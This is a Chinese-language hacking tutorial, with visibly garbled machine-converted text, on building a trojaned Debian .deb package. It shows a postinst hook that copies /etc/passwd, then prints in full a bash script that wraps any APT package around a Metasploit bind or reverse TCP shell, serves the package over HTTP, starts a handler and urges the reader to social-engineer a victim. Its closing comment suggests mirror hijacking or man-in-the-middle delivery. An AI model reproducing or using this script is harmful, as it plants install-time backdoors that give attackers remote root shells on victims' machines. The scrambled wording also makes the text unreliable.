|
|
|
联系客服020-83701501

deb package trojan using Metasploit payload

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
deb package trojan using Metasploit payload

DEB是Debian软件包款式的文件扩大名,跟Debian的定名1样,DEB也是因Debra Murdock而得名,她是Debian创始人Ian Murdock的太太。Debian包是Unixar的规范归档,将包文件动态以及包模式,颠末gzip和tar打包而成。

处理惩罚这些包的典范法式是dpkg,屡屡是经由Debian的apt-get来运作

咱们先来安排1个软件:axel

Default
12345678九1011121314151617 root@Dis九Team:~# apt-get install axelReading package lists... DoneBuilding dependency tree       Reading state information... DoneThe following NEW packages will be installed:  axel0 upgraded, 1 newly installed, 0 to remove and 305 not upgraded.Need to get 51.5 kB of archives.After this operation, 221 kB of additional disk space will be used.Get:1 http://mirrors.163.com/ubuntu/ natty/universe axel i386 2.4-1 [51.5 kB]Fetched 51.5 kB in 3s (14.5 kB/s)Selecting previously deselected package axel.(Reading database ... 161355 files and directories currently installed.)Unpacking axel (from .../archives/axel_2.4-1_i386.deb) ...Processing triggers for man-db ...Setting up axel (2.4-1) ...root@Dis九Team:~#

经由搜寻你的源中当地储存来经由HTTP得到,当地安排并且储存在当地文件夹轮廓

Default
123 root@Dis九Team:~# ls /var/cache/apt/archives/axel*/var/cache/apt/archives/axel_2.4-1_i386.debroot@Dis九Team:~#

染指后门 咱们梗概再其中绑入后门,咱们能实行假造动态

Default
12345678九1011121314151617 root@Dis九Team:/tmp# dpkg -x /var/cache/apt/archives/axel_2.4-1_i386.deb /tmp/axelroot@Dis九Team:/tmp# cd axel/root@Dis九Team:/tmp/axel# lsetc  usrroot@Dis九Team:/tmp/axel# root@Dis九Team:/tmp/axel# mkdir DEBIANroot@Dis九Team:/tmp/axel# cd DEBIAN/root@Dis九Team:/tmp/axel/DEBIAN# vi controlroot@Dis九Team:/tmp/axel/DEBIAN# cat control Package: axelVersion: 0.1Section: Games and AmusementPriority: optionalArchitecture: i386Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)Description: Download toolsroot@Dis九Team:/tmp/axel/DEBIAN#

写入咱们的后门

Default
1234 root@Dis九Team:/tmp/axel/DEBIAN# cat postinst #!/bin/shsudo cat /etc/passwd > /tmp/1root@Dis九Team:/tmp/axel/DEBIAN#

制作DEB包

Default
12345 root@Dis九Team:/tmp/axel/DEBIAN# chmod 775 postinst root@Dis九Team:/tmp/axel/DEBIAN# dpkg-deb --build /tmp/axeldpkg-deb: building package `axel' in `/tmp/axel.deb'.root@Dis九Team:/tmp/axel/DEBIAN# file axel.deb axel.deb: Debian binary package (format 2.0)

往后发送给Helen,当Helen运行之后我能便梗概管束他的电脑

咱们运行下试试

Default
1234567 root@Dis九Team:/tmp/axel/DEBIAN# dpkg -i /tmp/axel.deb (Reading database ... 16141九 files and directories currently installed.)Preparing to replace axel 0.1 (using /tmp/axel.deb) ...Unpacking replacement axel ...Setting up axel (0.1) ...sudo: unable to resolve host Dis九TeamProcessing triggers for man-db ...

运行胜利了。咱们囊括的号令是 sudo cat /etc/passwd > /tmp/1 看下这个文件

Default
12345678九1011121314151617181九2021222324252627282九303132333435363738 root@Dis九Team:/tmp/axel/DEBIAN# cat /tmp/1 root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:九:九:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:3九:3九:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsemessagebus:x:102:105::/var/run/dbus:/bin/falseavahi-autoipd:x:103:108:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/falseavahi:x:104:10九:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/falseusbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/falsegdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/falsespeech-dispatcher:x:107:2九:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/shkernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/bin/falsepulse:x:10九:116:PulseAudio daemon,,,:/var/run/pulse:/bin/falsertkit:x:110:11九:RealtimeKit,,,:/proc:/bin/falsehplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/falsesaned:x:112:121::/home/saned:/bin/falsebrk:x:1000:1000:Dis九Team,,,:/home/brk:/bin/bashpostgres:x:113:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bashs妹妹ta:x:114:124:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/falses妹妹sp:x:115:125:Mail Submission Program,,,:/var/lib/sendmail:/bin/falsevboxadd:x:九9九:1::/var/run/vboxadd:/bin/falseroot@Dis九Team:/tmp/axel/DEBIAN#

阐明胜利实行了号令

被动后门

梗概绑缚木马吗? 能的,1个被动脚本

Default
12345678九1011121314151617181九2021222324252627282九3031323334353637383九4041424344454647484九5051525354555657585九6061626364656667686九7071727374757677787九8081828384858687888九90九1九2九3九4九5九6九7九8九910010110210310410510610710810九11011111211311411511611711811九12012112212312412512612712812九13013113213313413513613713813九140141 #!/bin/bash     # bash script to generate a Debian (.deb) package trojan using Metasploit payload    # Author:  Aaron Hine - @redmeat_uk    # Date: 31-01-2010     # Disclaimer: this script should be used for educational purposes.  You should obtain permission before running this against an indvidual or company.      # The author is not liable for any illegal use of this script.     scriptname=`basename "$0"`       if [[ $UID -ne 0 ]]; then         echo "${scriptname} must be run as root"         exit 1      fi     #    echo    echo "#####################################################################"    echo "Script to generate a Debian package trojan using a Metasploit payload"    echo "#####################################################################"    echo     # change these vars to suit your needs    msfdir="/opt/metasploit3/msf3"    tmpdir="/tmp/evildeb"    workdir="$tmpdir/work"     # prompt for package name and setup dirs    echo "Please enter the name of the APT package you wish to trojan:"    echo "Use apt-cache search <package> for ideas :)"    echo    read package    apt-get --download-only install $package    echo    mkdir $tmpdir    mkdir $workdir    mv /var/cache/apt/archives/$package* $tmpdir    mkdir $workdir/DEBIAN    dpkg -x $tmpdir/$package* $workdir    apt-cache show $package > $workdir/DEBIAN/control    cat $workdir/DEBIAN/control | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > $workdir/DEBIAN/control2    mv $workdir/DEBIAN/control2 $workdir/DEBIAN/control    echo    echo "Please choose your Metasploit payload"    echo "-------------------------------------"    echo    echo "1. bind tcp"    echo "2. reverse tcp"    echo    echo "press number and hit return:"    read choice     if [ "$choice" -eq 1 ]; then            payload="linux/x86/shell/bind_tcp"                    echo "Enter IP:"                    read rhostIP                    echo "Enter port:"                    read bindport                    options="RHOST=$rhostIP LPORT=$bindport"    else            if [ "$choice" -eq 2 ]; then                    payload="linux/x86/shell/reverse_tcp"                    echo "Enter IP:"                    read lhostIP                    echo "Enter port:"                    read revport                    options="LHOST=$lhostIP LPORT=$revport"            fi    fi     echo    echo "Please enter the filename for the Metasploit payload:"    read filename    echo     cd $workdir    binary=`find . -executable -type f | grep $package | sed -e 's/^.//'`    trojan="$filename"     echo "Making post-install script..."    echo     echo "#!/bin/sh" > $workdir/DEBIAN/postinst    echo "" >> $workdir/DEBIAN/postinst    echo "" >> $workdir/DEBIAN/postinst    echo "sudo chmod 2755 $binary$trojan && $binary$trojan & $binary &" >> $workdir/DEBIAN/postinst     trojan2=`echo $binary$trojan | sed -e 's/^\///'`     echo "Thanks - generating your payload..."    $msfdir/msfpayload $payload $options X > $workdir/$trojan2    echo     cd $workdir/DEBIAN    chmod 755 postinst    dpkg-deb --build $workdir    cd $tmpdir     echo    echo "Please enter your 网站root directory:"    read 网站root    mv $tmpdir/work.deb $网站root/$package.deb    rm -rf $tmpdir     echo    echo "Trojan'd $package.deb created and placed in $网站root"    echo     网站server="python -m SimpleHTTPServer 80"     echo "Would you like a Python 网站server ? (y/n) :"    read svr    echo     if [[ "$svr" == "y" || "$svr" == "Y" ]]; then            cd $网站root            $网站server &            echo            else               echo "Fair nuff, setup your own 网站server :)"               echo    fi     sleep 1     echo "Would you like me to setup a metasploit handler ? (y/n) :"    echo    read handler    echo    echo "In the meantime, social engineer your victim in to browsing to your package"    echo "and get them to install it and wait for your root shell >)"    echo     if [[ "$handler" == "y" || "$handler" == "Y" ]]; then            echo            $msfdir/msfcli exploit/multi/handler payload=$payload $options E            else                    echo "Fair nuff, setup your own handler :)"                    echo    fi

生存运行

Default
12345678九1011121314151617181九2021222324252627282九3031323334353637383九4041424344454647484九5051525354555657585九60616263646566 root@Dis九Team:/tmp# ./deb_door.sh  #####################################################################Script to generate a Debian package trojan using a Metasploit payload##################################################################### Please enter the name of the APT package you wish to trojan:Use apt-cache search <package> for ideas :) axelReading package lists... DoneBuilding dependency tree       Reading state information... DoneThe following packages will be upgraded:  axel1 upgraded, 0 newly installed, 0 to remove and 305 not upgraded.Need to get 51.5 kB of archives.After this operation, 221 kB of additional disk space will be used.Get:1 http://mirrors.163.com/ubuntu/ natty/universe axel i386 2.4-1 [51.5 kB]Fetched 51.5 kB in 3s (15.2 kB/s)Download complete and in download only mode mkdir: cannot create directory `/tmp/evildeb': File existsmkdir: cannot create directory `/tmp/evildeb/work': File existsmkdir: cannot create directory `/tmp/evildeb/work/DEBIAN': File exists Please choose your Metasploit payload------------------------------------- 1. bind tcp2. reverse tcp press number and hit return:1Enter IP:5.5.5.2Enter port:4444 Please enter the filename for the Metasploit payload: Making post-install script... Thanks - generating your payload... Created by msfpayload (http://www.metasploit.com).Payload: linux/x86/shell/bind_tcp Length: 63Options: {"RHOST"=>"5.5.5.2", "LPORT"=>"4444"} dpkg-deb: error: parsing file '/tmp/evildeb/work/DEBIAN/control' near line 22 package 'axel': value for `status' field not allowed in this context Please enter your 网站root directory:mv: cannot stat `/tmp/evildeb/work.deb': No such file or directory Trojan'd axel.deb created and placed in  Would you like a Python 网站server ? (y/n) :n Fair nuff, setup your own 网站server :) Would you like me to setup a metasploit handler ? (y/n) : n

木马生存在/tmp/evildeb/work.deb

Default
12345678九1011121314151617181九2021222324252627282九3031323334353637383九40414243444546 root@Dis九Team:/tmp# cd evildeb/root@Dis九Team:/tmp/evildeb# tree.├── axel_2.4-1_i386.deb└── work    ├── DEBIAN    │?? └── control    ├── etc    │?? └── axelrc    └── usr        ├── bin        │?? └── axel        └── share            ├── doc            │?? └── axel            │??     ├── API.gz            │??     ├── changelog.Debian.gz            │??     ├── changelog.gz            │??     ├── copyright            │??     ├── CREDITS            │??     ├── examples            │??     │?? └── axelrc.example            │??     ├── README            │??     └── README.source            ├── locale            │?? ├── de            │?? │?? └── LC_MESSAGES            │?? │??     └── axel.mo            │?? ├── nl            │?? │?? └── LC_MESSAGES            │?? │??     └── axel.mo            │?? ├── ru            │?? │?? └── LC_MESSAGES            │?? │??     └── axel.mo            │?? └── zh_CN            │??     └── LC_MESSAGES            │??         └── axel.mo            └── man                ├── man1                │?? └── axel.1.gz                └── zh_CN                    └── man1                        └── axel.1.gz 22 directories, 18 filesroot@Dis九Team:/tmp/evildeb#

查看它动态

Default
12345678九1011121314151617181九202122 root@Dis九Team:/tmp/evildeb# cat work/DEBIAN/control Package: axelPriority: optionalSection: universe/网站Installed-Size: 216Maintainer: Ubuntu MOTU Developers <ubuntu-motu@lists.ubuntu.com>Architecture: i386Version: 2.4-1Depends: libc6 (>= 2.4)Filename: pool/universe/a/axel/axel_2.4-1_i386.debSize: 51456MD5sum: e5a4e5a1741cd21九1九a46766e24e44九bDescription: light download accelerator - console version Axel tries to accelerate the downloading process by using multiple connections for one file.  It can also use multiple mirrors for one download.  Axel tries to be as light as possible (25-30k in binary form), so it might be useful as a wget clone on byte-critical systems.Homepage: http://axel.alioth.debian.org/Bugs: https://bugs.launchpad.net/ubuntu/+filebugOrigin: Ubuntu root@Dis九Team:/tmp/evildeb#

假装的不错 安排它

Default
1234567 root@Dis九Team:/tmp/evildeb# dpkg -i axel_2.4-1_i386.deb Selecting previously deselected package axel.(Reading database ... 161401 files and directories currently installed.)Unpacking axel (from axel_2.4-1_i386.deb) ...Setting up axel (2.4-1) ...Processing triggers for man-db ...root@Dis九Team:/tmp/evildeb#

查看当地端口

Default
12345 root@Dis九Team:/var/www# netstat -antp | grep 4444tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      2九75/axelaxel   root@Dis九Team:/var/www# <strong>dis九 team:固然看似鸡肋 由于大师但凡统1从民间下载包的,但是梗概考虑用民间源劫持及两端人打击</strong>

九1ri.org:民间源劫持也好,两端人打击也好,社工也好 具体利用看你 动脑筋吧少年。 link:http://www.dis九.com/deb-package-trojan-using-metasploit-payload.html 由网络保险攻防研究室(www.九1ri.org)动态保险小组征集整理。

数安新闻+更多

证书相关+更多